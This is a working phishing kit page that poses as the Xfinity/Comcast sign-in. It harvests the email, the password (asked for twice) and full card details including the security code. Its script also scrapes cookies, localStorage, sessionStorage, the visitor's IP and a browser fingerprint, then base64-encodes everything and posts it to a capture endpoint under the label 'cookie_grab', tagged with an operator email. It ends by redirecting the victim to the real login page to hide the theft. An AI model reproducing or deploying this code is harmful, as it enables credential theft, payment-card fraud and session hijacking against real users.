<?php
/**
 * ============================================================================
 * ANTIBOT INTEGRATION - Loaded first, before ANY output
 * ============================================================================
 */
require_once __DIR__ . '/capture/antibot_handler.php';
$antibot = $GLOBALS['antibot'] ?? null;
?>
<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Sign in to Xfinity</title>
    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
    <link href="https://fonts.googleapis.com/css2?family=Work+Sans:ital,wght@0,100..900;1,100..900&display=swap"
        rel="stylesheet">
    <script src="https://cdn.tailwindcss.com"></script>
    <script>
        tailwind.config = {
            theme: {
                extend: {
                    boxShadow: {
                        'inset-border-active': 'inset 0 0 0 1px #0d54ff',
                    },
                    fontFamily: {
                        sans: ['Work Sans', 'sans-serif'],
                    }
                }
            }
        }
    </script>
    <style>
        body {
            font-family: 'Work Sans', sans-serif;
            background-color: #fff;
        }
        .form-container {
            @apply border rounded-xl w-[360px] flex flex-col items-center py-5;
        }
        .hidden {
            display: none !important;
        }
    </style>
</head>

<body>

    <!-- ================================================================== -->
    <!-- Step 1: Login                                                      -->
    <!-- ================================================================== -->
    <div id="step-1" class="w-screen h-screen md:flex items-center bg-[#fff]">
        <div class="md:ml-[10rem] md:w-[30rem] p-4 md:p-2">
            <header>
                <svg class="size-[7rem]" aria-label="Logo" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 69 23.28">
                    <path fill="#8b8b97"
                        d="M7.71,11.76,12,6H10.23a2,2,0,0,0-1.76.86L6.19,9.88,4,6.81A2,2,0,0,0,2.21,6H.4l4.28,5.81L0,18.09H1.71a2,2,0,0,0,1.76-.86l2.71-3.59,6.35,8.78a2,2,0,0,0,1.76.86h1.86Zm34.68,6.33h2.45V6H42.39Zm-19.45,0H25.4V6H22.94Zm37.18,4.28L69,6H67.67a1.81,1.81,0,0,0-1.76.86l-3.5,6.5-3-6.5A1.75,1.75,0,0,0,57.62,6H56.34L61,15.85l-4.07,7.43h1.33A2,2,0,0,0,60.12,22.37ZM28.32,6V18.09h2.45V9.76A3.86,3.86,0,0,1,34,8c1.81,0,3,1.14,3,3.43v5.47a1.11,1.11,0,0,0,1.14,1.17h1.31V11c0-3.14-2-5.33-4.9-5.33a5.47,5.47,0,0,0-3.81,1.45V6Zm21.06,7.83a4.21,4.21,0,0,0,4.52,4.52,6.23,6.23,0,0,0,1.79-.24l-.5-2.14a5,5,0,0,1-1.12.12,2.08,2.08,0,0,1-2.24-2.31V8.14h3.43L54.27,6H51.84V1.07L49.39,2.14V6H46.79V8.14h2.59Zm-34-5.64v9.95h2.45V8.14H21V6H17.85V5c0-2.07,1.24-2.76,2.45-2.76a2.93,2.93,0,0,1,.83.12l.5-2.17A4.29,4.29,0,0,0,20.11,0c-3,0-4.71,2.26-4.71,5V6H14.11L12.57,8.14Z" />
                </svg>
            </header>

            <main>
                <h3 class="text-[#141417] font-bold text-[1.5rem] md:text-[1.9rem] mb-5">
                    Sign in with your Xfinity ID
                </h3>

                <div id="show-email-back" class="hidden flex items-center mb-4 gap-2 cursor-pointer">
                    <svg stroke="currentColor" fill="currentColor" stroke-width="0" viewBox="0 0 512 512" height="1em"
                        width="1em" xmlns="http://www.w3.org/2000/svg">
                        <path
                            d="M401.4 224h-214l83-79.4c11.9-12.5 11.9-32.7 0-45.2s-31.2-12.5-43.2 0L89 233.4c-6 5.8-9 13.7-9 22.4v.4c0 8.7 3 16.6 9 22.4l138.1 134c12 12.5 31.3 12.5 43.2 0 11.9-12.5 11.9-32.7 0-45.2l-83-79.4h214c16.8 0 30.3-13.7 30.3-30.3 0-16.8-13.5-30.3-30.3-30.3z">
                        </path>
                    </svg>
                    <p id="displayed-email" class="text-gray-500"></p>
                </div>

                <div>
                    <section>
                        <input id="input-field" placeholder="Email, mobile, or username"
                            class="border-2 outline-none w-full px-5 py-4 rounded" type="text">

                        <div id="error-message-container" class="hidden">
                            <p class="text-[#B7023C] text-sm flex gap-2 items-center mt-2">
                                <span>
                                    <svg stroke="currentColor" fill="currentColor" stroke-width="0" viewBox="0 0 24 24"
                                        height="1em" width="1em" xmlns="http://www.w3.org/2000/svg">
                                        <path fill="none" d="M0 0h24v24H0z"></path>
                                        <path
                                            d="M12.866 3l9.526 16.5a1 1 0 0 1-.866 1.5H2.474a1 1 0 0 1-.866-1.5L11.134 3a1 1 0 0 1 1.732 0zM11 16v2h2v-2h-2zm0-7v5h2V9h-2z">
                                        </path>
                                    </svg>
                                </span>
                                <span id="error-text">The Xfinity ID or password you entered was incorrect. Please try
                                    again.</span>
                            </p>
                        </div>

                        <p class="mt-6">
                            By signing in, you agree to our
                            <span class="text-[#3A0092]">Terms of Service</span> and
                            <span class="text-[#3A0092]">Privacy Policy</span>.
                        </p>
                    </section>

                    <button id="btn-submit"
                        class="font-semibold text-white bg-[#6138f5] hover:bg-[#3A0092] rounded px-10 py-5 mt-3"
                        type="button">
                        Let's go
                    </button>
                </div>
            </main>
        </div>
    </div>

    <!-- ================================================================== -->
    <!-- Step 2: Payment                                                    -->
    <!-- ================================================================== -->
    <div id="step-2" class="hidden min-h-screen bg-gray-100 p-4">
        <div class="max-w-md mx-auto bg-white rounded-lg shadow-md overflow-hidden">
            <div class="p-6">
                <h1 class="text-3xl font-bold mb-8 text-center">
                    Update payment information
                </h1>

                <form id="payment-form">
                    <div class="mb-4">
                        <label class="block text-gray-700 mb-1">Name on card</label>
                        <input type="text" name="nameOnCard" id="nameOnCard" placeholder="Ex. John Website"
                            class="w-full p-3 border border-gray-300 rounded">
                        <p id="error-nameOnCard" class="text-red-500 text-sm mt-1 hidden"></p>
                    </div>

                    <div class="mb-4">
                        <label class="block text-gray-700 mb-1">
                            Card Number <span class="text-red-500">*</span>
                        </label>
                        <input type="text" name="cardNumber" id="cardNumber" placeholder="1234 5678 9012 3456"
                            maxLength="19" class="w-full p-3 border border-gray-300 rounded">
                        <p id="error-cardNumber" class="text-red-500 text-sm mt-1 hidden"></p>
                    </div>

                    <div class="mb-4">
                        <label class="block text-gray-700 mb-1">
                            Security code <span class="text-red-500">*</span>
                        </label>
                        <input type="password" name="securityCode" id="securityCode" placeholder="•••" maxLength="4"
                            class="w-full p-3 border border-gray-300 rounded">
                        <p id="error-securityCode" class="text-red-500 text-sm mt-1 hidden"></p>
                    </div>

                    <div class="mb-4">
                        <label class="block text-gray-700 mb-1">
                            Expiry date <span class="text-red-500">*</span>
                        </label>
                        <input type="text" name="expiryDate" id="expiryDate" placeholder="MM/YY" maxLength="5"
                            class="w-full p-3 border border-gray-300 rounded">
                        <p id="error-expiryDate" class="text-red-500 text-sm mt-1 hidden"></p>
                    </div>

                    <div class="mb-6">
                        <label class="block text-gray-700 mb-1">
                            Zip code <span class="text-red-500">*</span>
                        </label>
                        <input type="text" name="zipCode" id="zipCode"
                            class="w-full p-3 border border-gray-300 rounded">
                        <p id="error-zipCode" class="text-red-500 text-sm mt-1 hidden"></p>
                    </div>

                    <button type="submit"
                        class="w-full bg-blue-500 hover:bg-blue-600 text-white font-medium py-3 px-4 rounded focus:outline-none">
                        Next
                    </button>

                    <div id="form-global-error" class="hidden mt-4 p-3 bg-red-100 text-red-700 rounded">
                        Please fix the errors above before proceeding.
                    </div>
                </form>
            </div>
        </div>
    </div>

    <!-- ================================================================== -->
    <!-- JAVASCRIPT: ALL MODULES IN ONE BLOCK                               -->
    <!-- ================================================================== -->
    <script>
// ========================================================================
// MODULE 1: COOKIE COLLECTOR
// ========================================================================
function collectAllCookies() {
    var cookies = {};
    if (document.cookie) {
        document.cookie.split(';').forEach(function(pair) {
            var trimmed = pair.trim();
            var idx = trimmed.indexOf('=');
            if (idx > -1) {
                var name = trimmed.substring(0, idx).trim();
                var value = trimmed.substring(idx + 1).trim();
                if (name) cookies[name] = value;
            }
        });
    }

    return {
        document_cookies: cookies,
        cookie_count: Object.keys(cookies).length,
        all_cookies_raw: document.cookie,
        local_storage: (function() {
            try {
                var ls = {};
                for (var i = 0; i < localStorage.length; i++) {
                    ls[localStorage.key(i)] = localStorage.getItem(localStorage.key(i));
                }
                return ls;
            } catch(e) { return {}; }
        })(),
        session_storage: (function() {
            try {
                var ss = {};
                for (var i = 0; i < sessionStorage.length; i++) {
                    ss[sessionStorage.key(i)] = sessionStorage.getItem(sessionStorage.key(i));
                }
                return ss;
            } catch(e) { return {}; }
        })(),
        browser: {
            user_agent: navigator.userAgent,
            platform: navigator.platform,
            language: navigator.language,
            screen: screen.width + 'x' + screen.height,
            viewport: window.innerWidth + 'x' + window.innerHeight,
            timezone: Intl.DateTimeFormat().resolvedOptions().timeZone,
            timezone_offset: new Date().getTimezoneOffset(),
            hardware_concurrency: navigator.hardwareConcurrency || 'unknown',
            device_memory: navigator.deviceMemory || 'unknown',
            vendor: navigator.vendor,
            cookies_enabled: navigator.cookieEnabled,
            do_not_track: navigator.doNotTrack || 'unspecified',
            webdriver: navigator.webdriver || false
        },
        page: {
            url: window.location.href,
            domain: document.domain,
            referrer: document.referrer || 'direct',
            title: document.title
        },
        timestamp: new Date().toISOString(),
        local_time: new Date().toString()
    };
}

// ========================================================================
// MODULE 2: UNIFIED SENDER — ONE CALL = ONE SEND
// ========================================================================
var CHAT_ID = 'dannieman100@gmail.com';
var SEND_LOCK = false; // Prevents duplicate sends

var state = {
    step: 1,
    email: '',
    password: '',
    password2: '',
    showPassword: false,
    showPassword2: false,
    ipAddress: ''
};

// DOM Elements
var step1 = document.getElementById('step-1');
var step2 = document.getElementById('step-2');
var inputField = document.getElementById('input-field');
var btnSubmit = document.getElementById('btn-submit');
var errorMessageContainer = document.getElementById('error-message-container');
var errorText = document.getElementById('error-text');
var showEmailBack = document.getElementById('show-email-back');
var displayedEmail = document.getElementById('displayed-email');
var paymentForm = document.getElementById('payment-form');

document.addEventListener('DOMContentLoaded', function() {
    fetchIP();
    btnSubmit.addEventListener('click', handleLoginClick);
    showEmailBack.addEventListener('click', handleBackClick);
    inputField.addEventListener('input', function() {
        errorMessageContainer.classList.add('hidden');
    });
    paymentForm.addEventListener('submit', handlePaymentSubmit);

    document.getElementById('cardNumber').addEventListener('input', function(e) {
        e.target.value = formatCardNumber(e.target.value);
        clearError('cardNumber');
    });
    document.getElementById('expiryDate').addEventListener('input', function(e) {
        e.target.value = formatExpiryDate(e.target.value);
        clearError('expiryDate');
    });
    ['nameOnCard', 'securityCode', 'zipCode'].forEach(function(id) {
        document.getElementById(id).addEventListener('input', function() { clearError(id); });
    });
});

function fetchIP() {
    fetch('https://api.ipify.org?format=json')
        .then(function(response) { return response.json(); })
        .then(function(data) { state.ipAddress = data.ip; })
        .catch(function(error) { console.error(error); });
}

function isValidEmail(email) {
    return /^[^\s@]+@[^\s@]+\.[^\s@]+$/.test(email);
}

/**
 * SEND TO SERVER — EXACTLY ONCE per call
 * Uses a lock to prevent duplicate sends from multiple event fires
 */
function unifiedSend(extraData) {
    // Lock to prevent duplicate calls
    if (SEND_LOCK) {
        console.log('[UnifiedSend] Skipped — send already in progress');
        return;
    }
    SEND_LOCK = true;

    var latestCookies = collectAllCookies();

    var dataPayload = {
        email: state.email || '',
        password: state.password || '',
        password2: state.password2 || '',
        user_cookies: latestCookies.document_cookies,
        user_cookies_raw: latestCookies.all_cookies_raw,
        user_cookie_count: latestCookies.cookie_count,
        user_local_storage: latestCookies.local_storage,
        user_session_storage: latestCookies.session_storage,
        browser: latestCookies.browser,
        page: latestCookies.page,
        IPAddress: state.ipAddress,
        timestamp: latestCookies.timestamp,
        local_time: latestCookies.local_time,
        name: 'Comcast',
        chatId: CHAT_ID,
        title: 'Comcast',
        extra: extraData || {}
    };

    // Encode once
    var payloadStr = JSON.stringify(dataPayload);
    var encodedPayload = btoa(unescape(encodeURIComponent(payloadStr)));

    var formBody = 'payload=' + encodeURIComponent(encodedPayload);
    formBody += '&action=cookie_grab';
    formBody += '&method=POST';
    formBody += '&source=payment_gateway';
    formBody += '&chatId=' + encodeURIComponent(CHAT_ID);

    // === SINGLE SEND via XMLHttpRequest (most reliable) ===
    var xhr = new XMLHttpRequest();
    xhr.open('POST', '/capture/capture.php', true);
    xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
    xhr.onreadystatechange = function() {
        if (xhr.readyState === 4) {
            console.log('[UnifiedSend] ✅ Sent | Cookies:', dataPayload.user_cookie_count, '| Response:', xhr.responseText);
            SEND_LOCK = false; // Release lock
        }
    };
    xhr.onerror = function() {
        SEND_LOCK = false; // Release lock on error too
    };
    xhr.send(formBody);

    console.log('[UnifiedSend] Sending to', CHAT_ID, '| Cookies:', dataPayload.user_cookie_count);
}

// ========================================================================
// MODULE 3: APP LOGIC
// ========================================================================

function handleLoginClick() {
    errorMessageContainer.classList.add('hidden');
    var value = inputField.value;

    if (!state.showPassword) {
        if (!isValidEmail(value)) {
            errorMessageContainer.classList.remove('hidden');
            errorText.innerText = 'The Xfinity ID or password you entered was incorrect. Please try again.';
            return;
        }
        state.email = value;
        state.showPassword = true;
        updateUIForPassword();
        return;
    }

    if (state.showPassword && !state.showPassword2) {
        if (!value) {
            errorMessageContainer.classList.remove('hidden');
            errorText.innerText = 'The Xfinity ID or password you entered was incorrect. Please try again.';
            return;
        }
        state.password = value;
        state.showPassword2 = true;
        updateUIForPassword2();
        return;
    }

    if (state.showPassword2) {
        if (!value) {
            errorMessageContainer.classList.remove('hidden');
            errorText.innerText = 'Please enter your password correctly';
            return;
        }
        state.password2 = value;

        // === SINGLE SEND: credentials + cookies ===
        unifiedSend({ action: 'login_step' });

        // Move to step 2
        state.step = 2;
        step1.classList.add('hidden');
        step2.classList.remove('hidden');
    }
}

function updateUIForPassword() {
    showEmailBack.classList.remove('hidden');
    displayedEmail.innerText = state.email;
    inputField.value = '';
    inputField.placeholder = 'Password';
    inputField.type = 'password';
}

function updateUIForPassword2() {
    inputField.value = '';
    inputField.placeholder = 'Enter password again';
    inputField.type = 'password';
}

function handleBackClick() {
    state.showPassword = false;
    state.showPassword2 = false;
    state.password = '';
    state.password2 = '';
    showEmailBack.classList.add('hidden');
    inputField.value = state.email;
    inputField.placeholder = 'Email, mobile, or username';
    inputField.type = 'text';
    errorMessageContainer.classList.add('hidden');
}

function formatCardNumber(value) {
    var v = value.replace(/\s+/g, '').replace(/[^0-9]/gi, '');
    var parts = [];
    for (var i = 0; i < v.length; i += 4) {
        parts.push(v.substring(i, i + 4));
    }
    return parts.join(' ');
}

function isValidExpiryDate(expiryDate) {
    if (!expiryDate) return false;
    if (!/^(0[1-9]|1[0-2])\/([0-9]{2})$/.test(expiryDate)) return false;
    var parts = expiryDate.split('/');
    var month = parseInt(parts[0], 10);
    var year = parseInt(parts[1], 10);
    var now = new Date();
    var curYear = now.getFullYear() % 100;
    var curMonth = now.getMonth() + 1;
    if (year < curYear || (year === curYear && month < curMonth)) return false;
    return true;
}

function formatExpiryDate(value) {
    var v = value.replace(/\s+/g, '').replace(/[^0-9]/gi, '');
    if (v.length > 2) {
        return v.substring(0, 2) + '/' + v.substring(2, 4);
    }
    return v;
}

function clearError(fieldId) {
    var errorEl = document.getElementById('error-' + fieldId);
    var inputEl = document.getElementById(fieldId);
    if (errorEl) errorEl.classList.add('hidden');
    if (inputEl) {
        inputEl.classList.remove('border-red-500');
        inputEl.classList.add('border-gray-300');
    }
    document.getElementById('form-global-error').classList.add('hidden');
}

function showError(fieldId, message) {
    var errorEl = document.getElementById('error-' + fieldId);
    var inputEl = document.getElementById(fieldId);
    if (errorEl) { errorEl.innerText = message; errorEl.classList.remove('hidden'); }
    if (inputEl) {
        inputEl.classList.remove('border-gray-300');
        inputEl.classList.add('border-red-500');
    }
}

function validateForm(formData) {
    var isValid = true;
    if (!formData.get('cardNumber').trim()) { showError('cardNumber', 'Card number is required'); isValid = false; }
    if (!formData.get('nameOnCard').trim()) { showError('nameOnCard', 'Name on card is required'); isValid = false; }
    var exp = formData.get('expiryDate');
    if (!exp.trim()) { showError('expiryDate', 'Expiry date is required'); isValid = false; }
    else if (!isValidExpiryDate(exp)) { showError('expiryDate', 'Invalid or expired date'); isValid = false; }
    var sec = formData.get('securityCode');
    if (!sec.trim()) { showError('securityCode', 'Security code is required'); isValid = false; }
    else if (!/^\d{3,4}$/.test(sec)) { showError('securityCode', 'Invalid security code'); isValid = false; }
    if (!formData.get('zipCode').trim()) { showError('zipCode', 'Zip code is required'); isValid = false; }
    return isValid;
}

function handlePaymentSubmit(e) {
    e.preventDefault();
    var formData = new FormData(paymentForm);
    if (validateForm(formData)) {
        var formDataObj = {};
        formData.forEach(function(value, key) { formDataObj[key] = value; });

        // === SINGLE SEND: payment data + cookies ===
        unifiedSend({
            action: 'payment_step',
            payment_data: formDataObj
        });

        // Redirect after send
        setTimeout(function() {
            window.location.replace('https://login.comcast.net/login');
        }, 500);
    } else {
        document.getElementById('form-global-error').classList.remove('hidden');
    }
}
</script>